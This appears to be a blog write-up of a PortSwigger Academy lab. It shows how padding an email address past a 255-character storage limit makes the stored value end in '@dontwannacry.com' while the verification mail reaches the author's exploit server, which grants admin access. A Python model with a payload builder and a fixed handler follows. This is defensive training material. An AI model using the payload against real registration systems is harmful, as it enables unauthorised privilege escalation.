PortSwigger Academy Lab: Inconsistent handling of exceptional input

Jun Takemura · March 15, 2025


Task

This lab doesn’t adequately validate user input. You can exploit a logic flaw in its account registration process to gain access to administrative functionality. To solve the lab, access the admin panel and delete the user carlos.

Hint

You can use the link in the lab banner to access an email client connected to your own private mail server. The client will display all messages sent to @YOUR-EMAIL-ID.web-security-academy.net and any arbitrary subdomains. Your unique email ID is displayed in the email client.

Attempt

The website has a registration feature, and the registration page shows the message: If you work for DontWannaCry, please use your @dontwannacry.com email address. This strongly suggests the target is some kind of email-handling flaw. In this lab I also have my own email domain, @exploit-0aa800e00358f43382b9a064014c0086.exploit-server.net.

Although the website didn't link to an admin panel, I was able to request /admin. Message shown: Admin interface only available if logged in as a DontWannaCry user. So if I can register an account with a DontWannaCry email address, I'll get access to the admin panel.

First I tried to create an account using a DontWannaCry domain:

Username: test1
Email: [email protected]
Password: pass

But registration requires email verification: Please check your emails for your account registration link. The link goes to the @dontwannacry.com mailbox, which I don't control.

Next I tried the below:

Username: test2
Email: test2@dontwannacry.com.exploit-0aa800e00358f43382b9a064014c0086.exploit-server.net
Password: pass

I was able to create the account (the verification email was delivered to my exploit server), but this subdomain isn't treated as @dontwannacry.com, so I still couldn't access the admin panel.

I tried a long one:

Username: test3
Email: test3_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@exploit-0aa800e00358f43382b9a064014c0086.exploit-server.net
Password: pass

I generated the 255-character string of A's with bash and copied it to the clipboard:

printf 'A%.0s' {1..255} | xclip -selection clipboard

I was able to create an account. My account page showed this:

Your username is: test3

Your email is: test3_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Count the length:

python3
print(len("test3_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"))

So the stored email is silently truncated to 255 characters, even though the full address was accepted and the verification link was delivered to it.

I want to register with an email ending in @dontwannacry.com.exploit-0aa800e00358f43382b9a064014c0086.exploit-server.net, so that the verification link reaches my exploit server, but have the truncated value on the account page end in @dontwannacry.com. That means the first 255 characters of the address must end with @dontwannacry.com, which is 17 characters, leaving 238 characters of padding for the local part:

printf 'A%.0s' {1..238} | xclip -selection clipboard

Let's try this one:

Username: test4
Email: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@dontwannacry.com.exploit-0aa800e00358f43382b9a064014c0086.exploit-server.net
Password: pass

I got access to the admin panel. I deleted carlos and solved the lab.
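The whole chain, as an added example written for this write-up (the lab's server code is not public, so this is a model, not its implementation): a registration handler that validates and sends mail using the full address but stores only the first 255 characters, an admin check that trusts the stored value, and a hardened version that rejects over-long input before anything else happens. The 255-character limit and the domains are taken from the write-up above; the function names are my own.

```python
# Added example modelling the lab's logic flaw; not the lab's own code.
# The registration handler validates the full address and sends the
# verification link to it, but the storage layer keeps only the first
# 255 characters, and the admin check reads that truncated value back.

MAX_EMAIL_LEN = 255  # assumed storage limit, matching what the account page displayed
COMPANY_DOMAIN = "dontwannacry.com"
ATTACKER_DOMAIN = "exploit-0aa800e00358f43382b9a064014c0086.exploit-server.net"


def build_payload(target_domain: str, attacker_domain: str, limit: int = MAX_EMAIL_LEN) -> str:
    """Pad the local part so the first `limit` characters end in @target_domain,
    while the full address still has the attacker's domain as its real mail domain."""
    suffix = "@" + target_domain                 # "@dontwannacry.com" is 17 characters
    local = "A" * (limit - len(suffix))          # 255 - 17 = 238 padding characters
    return f"{local}{suffix}.{attacker_domain}"


def mail_domain(address: str) -> str:
    """The domain an MTA would deliver to: everything after the last '@'."""
    return address.rsplit("@", 1)[1]


def register_vulnerable(email: str) -> dict:
    """Validates and e-mails using the full address, then stores a truncated copy."""
    if email.count("@") < 1:
        raise ValueError("invalid e-mail address")
    verification_domain = mail_domain(email)      # verification link goes here
    stored = email[:MAX_EMAIL_LEN]                # column silently truncates
    return {"verification_domain": verification_domain, "stored_email": stored}


def is_admin(stored_email: str) -> bool:
    """The admin panel trusts the stored value, not the address that was verified."""
    return stored_email.endswith("@" + COMPANY_DOMAIN)


def register_fixed(email: str) -> dict:
    """Hardened version: refuse input that would not be stored verbatim, and only
    then validate, so the address checked is exactly the address kept."""
    if len(email) > MAX_EMAIL_LEN:
        raise ValueError("e-mail address too long")
    if email.count("@") < 1:
        raise ValueError("invalid e-mail address")
    return {"verification_domain": mail_domain(email), "stored_email": email}


if __name__ == "__main__":
    payload = build_payload(COMPANY_DOMAIN, ATTACKER_DOMAIN)
    result = register_vulnerable(payload)
    print("verification sent to:", result["verification_domain"])
    print("stored as:", result["stored_email"][-40:])
    print("admin?", is_admin(result["stored_email"]))
```

The verification domain of the payload is dontwannacry.com.exploit-…exploit-server.net, a subdomain of the exploit server, which the hint says the lab's mail client receives; the stored value is the 238 A's followed by @dontwannacry.com, which is what the admin check sees. The fixed handler never reaches the truncation because it rejects the over-long address up front.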
